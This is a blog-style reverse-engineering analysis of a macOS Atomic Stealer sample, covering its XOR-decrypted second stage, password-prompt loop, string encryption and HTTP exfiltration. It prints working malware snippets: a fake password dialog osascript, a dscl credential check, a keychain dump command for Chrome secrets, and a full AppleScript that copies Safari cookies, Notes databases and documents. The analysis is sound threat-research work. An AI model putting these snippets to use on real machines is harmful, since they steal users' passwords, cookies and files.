AMOS (Atomic macOS Stealer) Analysis

Hello everybody, this is my first macOS malware analysis, I took a sample from malwarebazaar and tried to reverse it, the sample was uploaded by Cryptolaemus1 on 14 Feb 2024.

While analysing the stage two, it was clear that the sample is a variant of Atomic Stealer.

Atomic Stealer, as reported by SentinelOne is a macOS info stealer sold on Telegram, able to grab system information, account credential, browser data, session cookies and crypto wallets.

The main behaviours are the same already well described by RussianPanda.

Stage One  

The file downloaded from malwarebazaar is a dmg file called application_v1.1.dmg, I don’t know where it came from but we can suppose that it was distributed as a fake program as reported by Malwarebytes.

The SHA-256 for the file is 08ff8a6500d623b062dcef8a2ef6fc141c1871f7a84b42f842d470fee26070c4, obiviously it was already submitted on VirusTotal.

The dmg contains the following files:

• .DS_Store
• .DropDMGBackground
• .fseventsd:
• AppleApp

The mach-o AppleApp file is reported as malicious by VirusTotal, its SHA-256 is 4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa

The file is signed with an adhoc signature.

When the dmg file is opened, it shows the following image requesting the user to right click and use the open option.

When the the file is opened, it asks the user to enter his password.

Let’s try to reverse engineer the AppleApp mach-o to understand what it does.

Decrypt Stage Two Mach-o  

The main function of the x64 AppleApp mach-o, creates and prints the string “osascript -e ’tell application “Terminal” to close first windows& exit ‘”, and executes a fork, after that the parent process exits while the child process executes setsid, the osascript via system and the main2 function by running a new thread.

The main2 function gets the user name by executing getenv(“USER”), it decrypts an embedded mach-o file using the encryptDecrypt function (0xBFC10 is the size of the encrypted file), writes the decrypted file to /Users/USERNAME/exe, then using system it executes chmod +x on the new created file to make it executable, then it runs the exe file via system, after that it sleeps for 1 seconds and deletes the /Users/USERNAME/exe file.

The encryptDecrypt function is a simple xor between the encrypted mach-o file and the hardcoded key 0x13.

Stage Two  

The mach-o exe file is reported as malicious by VirusTotal, its SHA-256 is c802c94d0836039aa986e66200233bdf84a9f68512e7ba6d22e93ab679309d4a.

The file is signed with an adhoc signature.

The main function is similar to the one of the AppleApp mach-o, it creates and prints the string “osascript -e ’tell application “Terminal” to close first windows& exit ‘”, executes a fork, the parent process exits and the child process continue the execution.

The child process executes setsid, and executes the osascript by using the shellermy function.

The shellermy function is used to execute commands, it uses the popen function, and then reads the command output using the fread functions as shown in the image below.

After this the malware executes several functions to steal informations and files from the system.

Verify The User Password  

The malware checks the user password by calling the shellermy function with the dscl command shown below as parameter.

dscl . authonly "username" "password"

If the password is valid the dscl command returns an empty response, otherwise the following message is returned.

The haha_check_cv function is used to validate the dscl command output, it returns 1 if the user password is valid, otherwise it returns 0. In the following screenshot, we can see the haha_check_cv function executes the shellermy function (with the dscl command as parameter), comparing the shellermy output (it is the dscl command output) and returns the flag value related to the credential validity.

The first time the dscl command is executed with a blank password, if it fails, this means that the user has a password.

Ask the User Password  

The getpasswordit function is used to ask the user to enter his password by calling the shellermy function with the following osascript as parameter. If the user has a blank password, this function is not executed.

osascript -e 'display dialog "Required Application Helper. Please enter passphrase for USERNAME." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'

After that, the malware executes the dscl command again to validate the credentials, this process will be executed until the user enters the correct password. The credentials check is done by the haha_check_cv function.

The following screenshot of the getpasswordit function, shows the exit condition from the loop responsible to ask the user password, it breaks when the haha_check_cv returns 1.

Get System Information  

The malware gets system information by executing the following command via shellarmy.

system_profiler SPSoftwareDataTye SPHardwareDataType SPDisplaysDataType

In the image below we can see a portion of the command result in the debugger.

At this point RussianPanda reportes an anti-vm check, in this sample this check is not implemented.

Steal Data  

The Malware uses several functions to steal files related to Browsers, Wallets and System data.

RussiandPanda and BitDefender reported the new version of the “FileGrabber” functionality used by the malware to grab several files and put them in the folder ~/fg/. In their blogs, they showed the osascript used to do this.

In my sample the FileGrabber osacript and the related string FileGrabber used to create the file in the zip, are both encrypted in the segment section at the following addresses:

• 0x10003DFE2
• 0x10003E0FA
• 0x10003E33A
• 0x10003E5CA
• 0x10003E8EA

These strings are decrypted during the malware execution, but the script itself is never executed. In the following snipet you can see the decrypted FileGrabber osascript.

osascript -e '
    set destinationFolderPath to (path to home folder as text) & "fg:"
    set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"} 
    set bankSize to 0 
    tell application "Finder" 
    set username to short user name of (system info) 
    try 
        if not (exists folder destinationFolderPath) then 
            make new folder at (path to home folder) with properties {name:"fg"} 
        end if 
        set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:") 
        try 
            duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing 
        end try 
        
        set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:" 
        try 
            set notesFolder to folder notesFolderPath 
            set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder 
            repeat with aFile in notesFiles 
                set fileSize to size of aFile 
                if (bankSize + fileSize) < 10 * 1024 * 1024 then 
                    try 
                        duplicate aFile to folder destinationFolderPath with replacing 
                        set bankSize to bankSize + fileSize 
                    end try 
                else 
                    exit repeat 
                end if 
            end repeat 

        end try 
        
        set desktopFiles to every file of desktop 
        set documentsFiles to every file of folder "Documents" of (path to home folder) 
        repeat with aFile in (desktopFiles & documentsFiles) 
            set fileExtension to name extension of aFile 
            if fileExtension is in extensionsList then 
                set fileSize to size of aFile 
                if (bankSize + fileSize) < 10 * 1024 * 1024 then 
                    try 
                        duplicate aFile to folder destinationFolderPath with replacing 
                        set bankSize to bankSize + fileSize 
                    end try 
                else 
                    exit repeat 
                end if 
            end if 
        end repeat 
    end try 
end tell'

It looks like that the execution of the FileGrabber osascript was disabled, but the malware is still looking for the ~/fg/ folder when collecting informations. I suppose it was disabled in order to not save files on disk and to not allarm the user with an additional pop-up.

The ChronosMasiter function is used to find Chrome passwords in the keychain. It executes the following command by passing it as parameter to the shellermy function.

security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'

When the command is executed a system pop-up spawns because macOS wants the user to enter the password to access the keychain.

The ChronosMasiter function is executed only if the user has a blank password, I think it is a way to not allarm the user by asking for his password two times.

The read_dir function is used to open a directory and read its contents, it uses stat, opendir and the readdir functions as shown below.

The rodwrote function, is used to open and read files, it uses the open and the read functions, the file content is written into the zip using the mz_zip_writer_add_mem_ex_v2 function.

At this point the above functions are used to read folders and files, they are called by the following functions:

• grab_this_folder_nahuy : is responsible to steal Wallets data
• grab_this_nahuy: is responsible to steal Browser data
• getpw : is responsible to steal data related to Chrome Wallets plugins
• pathfox: is responsible to steal data related to Firefox

String Encryption  

All the strings are encrypted and are stored in the const segment, for example we can see the encrypted C2 string at address 0x10003DFCA.

The strings are not directly manipulated during the decryption process, they are copied in a Thread Local Variables(TLV) at offset 0x10. For example in the image below a thread local variable is used to store the encrypted C2 strings.

After that the encrypted strings is xored with a hardcoded key that is incremented by 1 at each iteration, for example in the following snipet the c2_thread_local_variable_1 variable is the address containing the Encrypted C2 string (at offset 0xA), the i variable is just a counter incresed by 1 at each iteration and 0x77 is the hardcoded key.

The hardcoded key is not the same for all the strings, there are keys that are added to the counter (for example 0x77 in Figure 24) and keys that are subtracted from it. The strings are basically the same reported by RussianPanda, you can find mine here

Data Exfiltration  

The malware exfiltrates the stolen informations using a zip file that is filled everytime it reads informations (username, password, files), the malware uses the functions mz_zip_writer_finalize_archive and mz_zip_writer_end_internal to finalize the zip file.

After that it executes the sentdata function to enstablish a connection to the C2 server and send a HTTP POST request containing the zip file.

The HTTP request has the two following headers with hardcoded values:

• uuid: 42b7baec-e6da-483a-b26c-0e9cb2579abf
• user: october

I dumped the zip file from the memory during an execution without any browser and wallet installed on the system, I found the following files related to the keychain, username, password and system information.

As example the file user contains the following data.

Conclusion  

The analysis of known malwares is still an interesting activity because every sample may have different behaviours.

The use of Thread Local Variables to decrypt and use the strings is very interesting.

The decrypting process described differs from the one reported in other blogs, moreover this sample requires only a minimum user interaction because the FileGrabber functiontality is disabled and the ChronosMasiter function is executed only if the user has a blank password.

The generic names such as application_v1.1.dmg, AppleApp, and the presence of several functions that are not used can lead us to suppose that this is a test version.

Feel free to contact me, I’d appreciate any feedback.

MITRE ATT&CK MATRIX  

Indicators of Compromise